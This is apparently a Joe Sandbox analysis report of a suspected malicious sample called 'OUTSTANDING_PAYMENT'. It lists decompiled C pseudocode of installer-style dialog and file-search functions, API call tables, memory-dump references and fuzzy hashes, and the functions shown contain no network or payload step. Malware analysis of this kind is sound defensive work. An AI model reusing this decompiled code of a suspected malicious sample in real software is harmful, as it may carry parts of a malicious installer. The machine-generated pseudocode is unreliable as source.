                                                                                                                        • Snapshot File: hcaresult_0_2_400000_OUTSTANDING_PAYMENT.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateInstance
                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp
                                                                                                                        • API String ID: 542301482-501415292
                                                                                                                        • Opcode ID: 077b7362f6a1d4038be91bf7f4b9e5842d68daf9de23732b557fb751e09ce78c
                                                                                                                        • Instruction ID: f110e38d5ccd8909b9e85e2ea6b1342c5fae2602ce40754bea02e3b472428d32
                                                                                                                        • Opcode Fuzzy Hash: 077b7362f6a1d4038be91bf7f4b9e5842d68daf9de23732b557fb751e09ce78c
                                                                                                                        • Instruction Fuzzy Hash: BC411771A00209EFCF40DFE4C989E9D7BB5BF49304B20456AF505EB2D1DB799981CB94
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0040290B Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 39%
                                                                                                                        			E0040290B(short __ebx, short* __edi) {
				void* _t21;

				if(FindFirstFileW(E00402DA6(2), _t21 - 0x2dc) != 0xffffffff) {
					E004065AF( *((intOrPtr*)(_t21 - 0xc)), _t8);
					_push(_t21 - 0x2b0);
					_push(__edi);
					E00406668();
				} else {
					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
					 *__edi = __ebx;
					 *((intOrPtr*)(_t21 - 4)) = 1;
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t21 - 4));
				return 0;
			}




                                                                                                                        0x00402923
                                                                                                                        0x0040293e
                                                                                                                        0x00402949
                                                                                                                        0x0040294a
                                                                                                                        0x00402a94
                                                                                                                        0x00402925
                                                                                                                        0x00402928
                                                                                                                        0x0040292b
                                                                                                                        0x0040292e
                                                                                                                        0x0040292e
                                                                                                                        0x00402c2d
                                                                                                                        0x00402c39

                                                                                                                        APIs
                                                                                                                        • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.267312472.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.267308244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267321764.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267370206.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_OUTSTANDING_PAYMENT.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FileFindFirst
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1974802433-0
                                                                                                                        • Opcode ID: b2f27a8a5f9b700f187602bb898c1293859530a573ae52e9df8ecc114fa703e5
                                                                                                                        • Instruction ID: b84bdfeecc4e8c0803ac0e71b8711fc90ef1d688bdc4be786e729a17b55638d3
                                                                                                                        • Opcode Fuzzy Hash: b2f27a8a5f9b700f187602bb898c1293859530a573ae52e9df8ecc114fa703e5
                                                                                                                        • Instruction Fuzzy Hash: 47F05E71A04105EBDB01DBB4EE49AAEB378EF14314F60457BE101F21D0E7B88E529B29
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00405031 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489windowmemoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 96%
                                                                                                                        			E00405031(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				long _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				signed char* _v32;
				int _v36;
				signed int _v44;
				int _v48;
				signed int* _v60;
				signed char* _v64;
				signed int _v68;
				long _v72;
				void* _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t198;
				intOrPtr _t201;
				long _t207;
				signed int _t211;
				signed int _t222;
				void* _t225;
				void* _t226;
				int _t232;
				long _t237;
				long _t238;
				signed int _t239;
				signed int _t245;
				signed int _t247;
				signed char _t248;
				signed char _t254;
				void* _t258;
				void* _t260;
				signed char* _t278;
				signed char _t279;
				long _t284;
				struct HWND__* _t291;
				signed int* _t292;
				int _t293;
				long _t294;
				signed int _t295;
				void* _t297;
				long _t298;
				int _t299;
				signed int _t300;
				signed int _t303;
				signed int _t311;
				signed char* _t319;
				int _t324;
				void* _t326;

				_t291 = _a4;
				_v12 = GetDlgItem(_t291, 0x3f9);
				_v8 = GetDlgItem(_t291, 0x408);
				_t326 = SendMessageW;
				_v24 =  *0x42a288;
				_v28 =  *0x42a270 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t301 = _a16;
					} else {
						_a12 = 0;
						_t301 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t301;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t301 + 4)) == 0x408) {
							if(( *0x42a279 & 0x00000002) != 0) {
								L41:
								if(_v16 != 0) {
									_t237 = _v16;
									if( *((intOrPtr*)(_t237 + 8)) == 0xfffffe3d) {
										SendMessageW(_v8, 0x419, 0,  *(_t237 + 0x5c));
									}
									_t238 = _v16;
									if( *((intOrPtr*)(_t238 + 8)) == 0xfffffe39) {
										_t301 = _v24;
										_t239 =  *(_t238 + 0x5c);
										if( *((intOrPtr*)(_t238 + 0xc)) != 2) {
											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) & 0xffffffdf;
										} else {
											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t301 = 0 | _a8 != 0x00000413;
								_t245 = E00404F7F(_v8, _a8 != 0x413);
								_t295 = _t245;
								if(_t295 >= 0) {
									_t94 = _v24 + 8; // 0x8
									_t301 = _t245 * 0x818 + _t94;
									_t247 =  *_t301;
									if((_t247 & 0x00000010) == 0) {
										if((_t247 & 0x00000040) == 0) {
											_t248 = _t247 ^ 0x00000001;
										} else {
											_t254 = _t247 ^ 0x00000080;
											if(_t254 >= 0) {
												_t248 = _t254 & 0x000000fe;
											} else {
												_t248 = _t254 | 0x00000001;
											}
										}
										 *_t301 = _t248;
										E0040117D(_t295);
										_a12 = _t295 + 1;
										_a16 =  !( *0x42a278) >> 0x00000008 & 0x00000001;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t301 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageW(_v8, 0x200, 0, 0);
							}
							if(_a8 == 0x40b) {
								_t225 =  *0x42372c;
								if(_t225 != 0) {
									ImageList_Destroy(_t225);
								}
								_t226 =  *0x423740;
								if(_t226 != 0) {
									GlobalFree(_t226);
								}
								 *0x42372c = 0;
								 *0x423740 = 0;
								 *0x42a2c0 = 0;
							}
							if(_a8 != 0x40f) {
								L90:
								if(_a8 == 0x420 && ( *0x42a279 & 0x00000001) != 0) {
									_t324 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t324);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t324);
								}
								goto L93;
							} else {
								E004011EF(_t301, 0, 0);
								_t198 = _a12;
								if(_t198 != 0) {
									if(_t198 != 0xffffffff) {
										_t198 = _t198 - 1;
									}
									_push(_t198);
									_push(8);
									E00404FFF();
								}
								if(_a16 == 0) {
									L75:
									E004011EF(_t301, 0, 0);
									_v36 =  *0x423740;
									_t201 =  *0x42a288;
									_v64 = 0xf030;
									_v24 = 0;
									if( *0x42a28c <= 0) {
										L86:
										if( *0x42a31e == 0x400) {
											InvalidateRect(_v8, 0, 1);
										}
										if( *((intOrPtr*)( *0x42923c + 0x10)) != 0) {
											E00404F3A(0x3ff, 0xfffffffb, E00404F52(5));
										}
										goto L90;
									}
									_t292 = _t201 + 8;
									do {
										_t207 =  *((intOrPtr*)(_v36 + _v24 * 4));
										if(_t207 != 0) {
											_t303 =  *_t292;
											_v72 = _t207;
											_v76 = 8;
											if((_t303 & 0x00000001) != 0) {
												_v76 = 9;
												_v60 =  &(_t292[4]);
												_t292[0] = _t292[0] & 0x000000fe;
											}
											if((_t303 & 0x00000040) == 0) {
												_t211 = (_t303 & 0x00000001) + 1;
												if((_t303 & 0x00000010) != 0) {
													_t211 = _t211 + 3;
												}
											} else {
												_t211 = 3;
											}
											_v68 = (_t211 << 0x0000000b | _t303 & 0x00000008) + (_t211 << 0x0000000b | _t303 & 0x00000008) | _t303 & 0x00000020;
											SendMessageW(_v8, 0x1102, (_t303 >> 0x00000005 & 0x00000001) + 1, _v72);
											SendMessageW(_v8, 0x113f, 0,  &_v76);
										}
										_v24 = _v24 + 1;
										_t292 =  &(_t292[0x206]);
									} while (_v24 <  *0x42a28c);
									goto L86;
								} else {
									_t293 = E004012E2( *0x423740);
									E00401299(_t293);
									_t222 = 0;
									_t301 = 0;
									if(_t293 <= 0) {
										L74:
										SendMessageW(_v12, 0x14e, _t301, 0);
										_a16 = _t293;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v28 + _t222 * 4)) != 0) {
											_t301 = _t301 + 1;
										}
										_t222 = _t222 + 1;
									} while (_t222 < _t293);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L93;
						} else {
							_t232 = SendMessageW(_v12, 0x147, 0, 0);
							if(_t232 == 0xffffffff) {
								goto L93;
							}
							_t294 = SendMessageW(_v12, 0x150, _t232, 0);
							if(_t294 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t294 * 4)) == 0) {
								_t294 = 0x20;
							}
							E00401299(_t294);
							SendMessageW(_a4, 0x420, 0, _t294);
							_a12 = _a12 | 0xffffffff;
							_a16 = 0;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					_v36 = 0;
					_v20 = 2;
					 *0x42a2c0 = _t291;
					 *0x423740 = GlobalAlloc(0x40,  *0x42a28c << 2);
					_t258 = LoadImageW( *0x42a260, 0x6e, 0, 0, 0, 0);
					 *0x423734 =  *0x423734 | 0xffffffff;
					_t297 = _t258;
					 *0x42373c = SetWindowLongW(_v8, 0xfffffffc, E0040563E);
					_t260 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x42372c = _t260;
					ImageList_AddMasked(_t260, _t297, 0xff00ff);
					SendMessageW(_v8, 0x1109, 2,  *0x42372c);
					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageW(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_t297);
					_t298 = 0;
					do {
						_t266 =  *((intOrPtr*)(_v28 + _t298 * 4));
						if( *((intOrPtr*)(_v28 + _t298 * 4)) != 0) {
							if(_t298 != 0x20) {
								_v20 = 0;
							}
							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, 0, E004066A5(_t298, 0, _t326, 0, _t266)), _t298);
						}
						_t298 = _t298 + 1;
					} while (_t298 < 0x21);
					_t299 = _a16;
					_push( *((intOrPtr*)(_t299 + 0x30 + _v20 * 4)));
					_push(0x15);
					E004045C4(_a4);
					_push( *((intOrPtr*)(_t299 + 0x34 + _v20 * 4)));
					_push(0x16);
					E004045C4(_a4);
					_t300 = 0;
					_v16 = 0;
					if( *0x42a28c <= 0) {
						L19:
						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t319 = _v24 + 8;
						_v32 = _t319;
						do {
							_t278 =  &(_t319[0x10]);
							if( *_t278 != 0) {
								_v64 = _t278;
								_t279 =  *_t319;
								_v88 = _v16;
								_t311 = 0x20;
								_v84 = 0xffff0002;
								_v80 = 0xd;
								_v68 = _t311;
								_v44 = _t300;
								_v72 = _t279 & _t311;
								if((_t279 & 0x00000002) == 0) {
									if((_t279 & 0x00000004) == 0) {
										 *( *0x423740 + _t300 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v88);
									} else {
										_v16 = SendMessageW(_v8, 0x110a, 3, _v16);
									}
								} else {
									_v80 = 0x4d;
									_v48 = 1;
									_t284 = SendMessageW(_v8, 0x1132, 0,  &_v88);
									_v36 = 1;
									 *( *0x423740 + _t300 * 4) = _t284;
									_v16 =  *( *0x423740 + _t300 * 4);
								}
							}
							_t300 = _t300 + 1;
							_t319 =  &(_v32[0x818]);
							_v32 = _t319;
						} while (_t300 <  *0x42a28c);
						if(_v36 != 0) {
							L20:
							if(_v20 != 0) {
								E004045F9(_v8);
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E004045F9(_v12);
								L93:
								return E0040462B(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}


























































                                                                                                                        0x00405038
                                                                                                                        0x00405051
                                                                                                                        0x00405056
                                                                                                                        0x0040505e
                                                                                                                        0x00405064
                                                                                                                        0x0040507a
                                                                                                                        0x0040507d
                                                                                                                        0x004052a8
                                                                                                                        0x004052af
                                                                                                                        0x004052c3
                                                                                                                        0x004052b1
                                                                                                                        0x004052b3
                                                                                                                        0x004052b6
                                                                                                                        0x004052b7
                                                                                                                        0x004052be
                                                                                                                        0x004052be
                                                                                                                        0x004052cf
                                                                                                                        0x004052dd
                                                                                                                        0x004052e0
                                                                                                                        0x004052f6
                                                                                                                        0x0040536b
                                                                                                                        0x0040536e
                                                                                                                        0x00405370
                                                                                                                        0x0040537a
                                                                                                                        0x00405388
                                                                                                                        0x00405388
                                                                                                                        0x0040538a
                                                                                                                        0x00405394
                                                                                                                        0x0040539a
                                                                                                                        0x0040539d
                                                                                                                        0x004053a0
                                                                                                                        0x004053bb
                                                                                                                        0x004053a2
                                                                                                                        0x004053ac
                                                                                                                        0x004053ac
                                                                                                                        0x004053a0
                                                                                                                        0x00405394
                                                                                                                        0x00000000
                                                                                                                        0x0040536e
                                                                                                                        0x004052fb
                                                                                                                        0x00405306
                                                                                                                        0x0040530b
                                                                                                                        0x00405312
                                                                                                                        0x00405317
                                                                                                                        0x0040531b
                                                                                                                        0x00405326
                                                                                                                        0x00405326
                                                                                                                        0x0040532a
                                                                                                                        0x0040532e
                                                                                                                        0x00405332
                                                                                                                        0x00405345
                                                                                                                        0x00405334
                                                                                                                        0x00405334
                                                                                                                        0x0040533b
                                                                                                                        0x00405341
                                                                                                                        0x0040533d
                                                                                                                        0x0040533d
                                                                                                                        0x0040533d
                                                                                                                        0x0040533b
                                                                                                                        0x00405349
                                                                                                                        0x0040534b
                                                                                                                        0x0040535e
                                                                                                                        0x00405361
                                                                                                                        0x00405364
                                                                                                                        0x00405364
                                                                                                                        0x0040532e
                                                                                                                        0x00000000
                                                                                                                        0x0040531b
                                                                                                                        0x004052fd
                                                                                                                        0x00405304
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004053be
                                                                                                                        0x004053be
                                                                                                                        0x004053c5
                                                                                                                        0x00405436
                                                                                                                        0x0040543e
                                                                                                                        0x00405446
                                                                                                                        0x00405446
                                                                                                                        0x0040544f
                                                                                                                        0x00405451
                                                                                                                        0x00405458
                                                                                                                        0x0040545b
                                                                                                                        0x0040545b
                                                                                                                        0x00405461
                                                                                                                        0x00405468
                                                                                                                        0x0040546b
                                                                                                                        0x0040546b
                                                                                                                        0x00405471
                                                                                                                        0x00405477
                                                                                                                        0x0040547d
                                                                                                                        0x0040547d
                                                                                                                        0x0040548a
                                                                                                                        0x004055eb
                                                                                                                        0x004055f2
                                                                                                                        0x0040560f
                                                                                                                        0x00405615
                                                                                                                        0x00405627
                                                                                                                        0x00405627
                                                                                                                        0x00000000
                                                                                                                        0x00405490
                                                                                                                        0x00405492
                                                                                                                        0x00405497
                                                                                                                        0x0040549c
                                                                                                                        0x004054a1
                                                                                                                        0x004054a3
                                                                                                                        0x004054a3
                                                                                                                        0x004054a4
                                                                                                                        0x004054a5
                                                                                                                        0x004054a7
                                                                                                                        0x004054a7
                                                                                                                        0x004054af
                                                                                                                        0x004054f0
                                                                                                                        0x004054f2
                                                                                                                        0x00405502
                                                                                                                        0x00405505
                                                                                                                        0x0040550a
                                                                                                                        0x00405511
                                                                                                                        0x00405514
                                                                                                                        0x004055b6
                                                                                                                        0x004055bf
                                                                                                                        0x004055c7
                                                                                                                        0x004055c7
                                                                                                                        0x004055d5
                                                                                                                        0x004055e6
                                                                                                                        0x004055e6
                                                                                                                        0x00000000
                                                                                                                        0x004055d5
                                                                                                                        0x0040551a
                                                                                                                        0x0040551d
                                                                                                                        0x00405523
                                                                                                                        0x00405528
                                                                                                                        0x0040552a
                                                                                                                        0x0040552c
                                                                                                                        0x00405532
                                                                                                                        0x00405539
                                                                                                                        0x0040553e
                                                                                                                        0x00405545
                                                                                                                        0x00405548
                                                                                                                        0x00405548
                                                                                                                        0x0040554f
                                                                                                                        0x0040555b
                                                                                                                        0x0040555f
                                                                                                                        0x00405561
                                                                                                                        0x00405561
                                                                                                                        0x00405551
                                                                                                                        0x00405553
                                                                                                                        0x00405553
                                                                                                                        0x00405581
                                                                                                                        0x0040558d
                                                                                                                        0x0040559c
                                                                                                                        0x0040559c
                                                                                                                        0x0040559e
                                                                                                                        0x004055a1
                                                                                                                        0x004055aa
                                                                                                                        0x00000000
                                                                                                                        0x004054b1
                                                                                                                        0x004054bc
                                                                                                                        0x004054bf
                                                                                                                        0x004054c4
                                                                                                                        0x004054c6
                                                                                                                        0x004054ca
                                                                                                                        0x004054da
                                                                                                                        0x004054e4
                                                                                                                        0x004054e6
                                                                                                                        0x004054e9
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004054cc
                                                                                                                        0x004054cc
                                                                                                                        0x004054d2
                                                                                                                        0x004054d4
                                                                                                                        0x004054d4
                                                                                                                        0x004054d5
                                                                                                                        0x004054d6
                                                                                                                        0x00000000
                                                                                                                        0x004054cc
                                                                                                                        0x004054af
                                                                                                                        0x0040548a
                                                                                                                        0x004053cd
                                                                                                                        0x00000000
                                                                                                                        0x004053e3
                                                                                                                        0x004053ed
                                                                                                                        0x004053f2
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00405404
                                                                                                                        0x00405409
                                                                                                                        0x00405415
                                                                                                                        0x00405415
                                                                                                                        0x00405417
                                                                                                                        0x00405426
                                                                                                                        0x00405428
                                                                                                                        0x0040542c
                                                                                                                        0x0040542f
                                                                                                                        0x00000000
                                                                                                                        0x0040542f
                                                                                                                        0x004053cd
                                                                                                                        0x00405083
                                                                                                                        0x00405088
                                                                                                                        0x00405091
                                                                                                                        0x00405098
                                                                                                                        0x004050aa
                                                                                                                        0x004050b5
                                                                                                                        0x004050bb
                                                                                                                        0x004050c9
                                                                                                                        0x004050dd
                                                                                                                        0x004050e2
                                                                                                                        0x004050ef
                                                                                                                        0x004050f4
                                                                                                                        0x0040510a
                                                                                                                        0x0040511b
                                                                                                                        0x00405128
                                                                                                                        0x00405128
                                                                                                                        0x0040512b
                                                                                                                        0x00405131
                                                                                                                        0x00405133
                                                                                                                        0x00405136
                                                                                                                        0x0040513b
                                                                                                                        0x00405140
                                                                                                                        0x00405142
                                                                                                                        0x00405142
                                                                                                                        0x00405162
                                                                                                                        0x00405162
                                                                                                                        0x00405164
                                                                                                                        0x00405165
                                                                                                                        0x0040516a
                                                                                                                        0x00405170
                                                                                                                        0x00405174
                                                                                                                        0x00405179
                                                                                                                        0x00405181
                                                                                                                        0x00405185
                                                                                                                        0x0040518a
                                                                                                                        0x0040518f
                                                                                                                        0x00405197
                                                                                                                        0x0040519a
                                                                                                                        0x0040526a
                                                                                                                        0x0040527d
                                                                                                                        0x00000000
                                                                                                                        0x004051a0
                                                                                                                        0x004051a3
                                                                                                                        0x004051a6
                                                                                                                        0x004051a9
                                                                                                                        0x004051a9
                                                                                                                        0x004051af
                                                                                                                        0x004051b8
                                                                                                                        0x004051bb
                                                                                                                        0x004051bf
                                                                                                                        0x004051c2
                                                                                                                        0x004051c5
                                                                                                                        0x004051ce
                                                                                                                        0x004051d7
                                                                                                                        0x004051da
                                                                                                                        0x004051dd
                                                                                                                        0x004051e0
                                                                                                                        0x0040521e
                                                                                                                        0x00405249
                                                                                                                        0x00405220
                                                                                                                        0x0040522f
                                                                                                                        0x0040522f
                                                                                                                        0x004051e2
                                                                                                                        0x004051e5
                                                                                                                        0x004051f3
                                                                                                                        0x004051fd
                                                                                                                        0x00405205
                                                                                                                        0x0040520c
                                                                                                                        0x00405217
                                                                                                                        0x00405217
                                                                                                                        0x004051e0
                                                                                                                        0x0040524f
                                                                                                                        0x00405250
                                                                                                                        0x0040525c
                                                                                                                        0x0040525c
                                                                                                                        0x00405268
                                                                                                                        0x00405283
                                                                                                                        0x00405286
                                                                                                                        0x004052a3
                                                                                                                        0x00000000
                                                                                                                        0x00405288
                                                                                                                        0x0040528d
                                                                                                                        0x00405296
                                                                                                                        0x00405629
                                                                                                                        0x0040563b
                                                                                                                        0x0040563b
                                                                                                                        0x00405286
                                                                                                                        0x00000000
                                                                                                                        0x00405268
                                                                                                                        0x0040519a

                                                                                                                        APIs
                                                                                                                        • GetDlgItem.USER32 ref: 00405049
                                                                                                                        • GetDlgItem.USER32 ref: 00405054
                                                                                                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 0040509E
                                                                                                                        • LoadImageW.USER32 ref: 004050B5
                                                                                                                        • SetWindowLongW.USER32 ref: 004050CE
                                                                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004050E2
                                                                                                                        • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 004050F4
                                                                                                                        • SendMessageW.USER32(?,00001109,00000002), ref: 0040510A
                                                                                                                        • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405116
                                                                                                                        • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00405128
                                                                                                                        • DeleteObject.GDI32(00000000), ref: 0040512B
                                                                                                                        • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405156
                                                                                                                        • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405162
                                                                                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 004051FD
                                                                                                                        • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040522D
                                                                                                                          • Part of subcall function 004045F9: SendMessageW.USER32(00000028,?,00000001,00404424), ref: 00404607
                                                                                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405241
                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 0040526F
                                                                                                                        • SetWindowLongW.USER32 ref: 0040527D
                                                                                                                        • ShowWindow.USER32(?,00000005), ref: 0040528D
                                                                                                                        • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405388
                                                                                                                        • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004053ED
                                                                                                                        • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405402
                                                                                                                        • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405426
                                                                                                                        • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405446
                                                                                                                        • ImageList_Destroy.COMCTL32(?), ref: 0040545B
                                                                                                                        • GlobalFree.KERNEL32 ref: 0040546B
                                                                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004054E4
                                                                                                                        • SendMessageW.USER32(?,00001102,?,?), ref: 0040558D
                                                                                                                        • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040559C
                                                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 004055C7
                                                                                                                        • ShowWindow.USER32(?,00000000), ref: 00405615
                                                                                                                        • GetDlgItem.USER32 ref: 00405620
                                                                                                                        • ShowWindow.USER32(00000000), ref: 00405627
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.267312472.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.267308244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267321764.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267370206.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_OUTSTANDING_PAYMENT.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                        • String ID: $M$N
                                                                                                                        • API String ID: 2564846305-813528018
                                                                                                                        • Opcode ID: de07a9e9a0be4199ac2fb0f6085adc1098bb242521470954e30eab12cbe79057
                                                                                                                        • Instruction ID: a1eb65f7683e17450fca8d4cb4c1055b074660be5b1b810df034ff690b7f681c
                                                                                                                        • Opcode Fuzzy Hash: de07a9e9a0be4199ac2fb0f6085adc1098bb242521470954e30eab12cbe79057
                                                                                                                        • Instruction Fuzzy Hash: 2A025CB0900609EFDF20DF65CD45AAE7BB5FB44315F10817AEA10BA2E1D7798A52CF18
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00404783 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204windowstringCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 91%
                                                                                                                        			E00404783(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
				intOrPtr _v8;
				int _v12;
				void* _v16;
				struct HWND__* _t56;
				signed int _t75;
				signed short* _t76;
				signed short* _t78;
				long _t92;
				int _t103;
				signed int _t110;
				intOrPtr _t113;
				WCHAR* _t114;
				signed int* _t116;
				WCHAR* _t117;
				struct HWND__* _t118;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L13:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x421714 =  *0x421714 + 1;
							}
							L27:
							_t114 = _a16;
							L28:
							return E0040462B(_a8, _a12, _t114);
						}
						_t56 = GetDlgItem(_a4, 0x3e8);
						_t114 = _a16;
						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
							_t113 =  *((intOrPtr*)(_t114 + 0x18));
							_v12 = _t103;
							_v16 = _t113;
							_v8 = 0x428200;
							if(_t103 - _t113 < 0x800) {
								SendMessageW(_t56, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorW(0, 0x7f02));
								_push(1);
								E00404A32(_a4, _v8);
								SetCursor(LoadCursorW(0, 0x7f00));
								_t114 = _a16;
							}
						}
						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
							goto L28;
						} else {
							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
								SendMessageW( *0x42a268, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
								SendMessageW( *0x42a268, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x421714 != 0) {
						goto L27;
					} else {
						_t116 =  *0x422720 + 0x14;
						if(( *_t116 & 0x00000020) == 0) {
							goto L27;
						}
						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E004045E6(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E00404A0E();
						goto L13;
					}
				}
				_t117 = _a16;
				_t75 =  *(_t117 + 0x30);
				if(_t75 < 0) {
					_t75 =  *( *0x42923c - 4 + _t75 * 4);
				}
				_t76 =  *0x42a298 + _t75 * 2;
				_t110 =  *_t76 & 0x0000ffff;
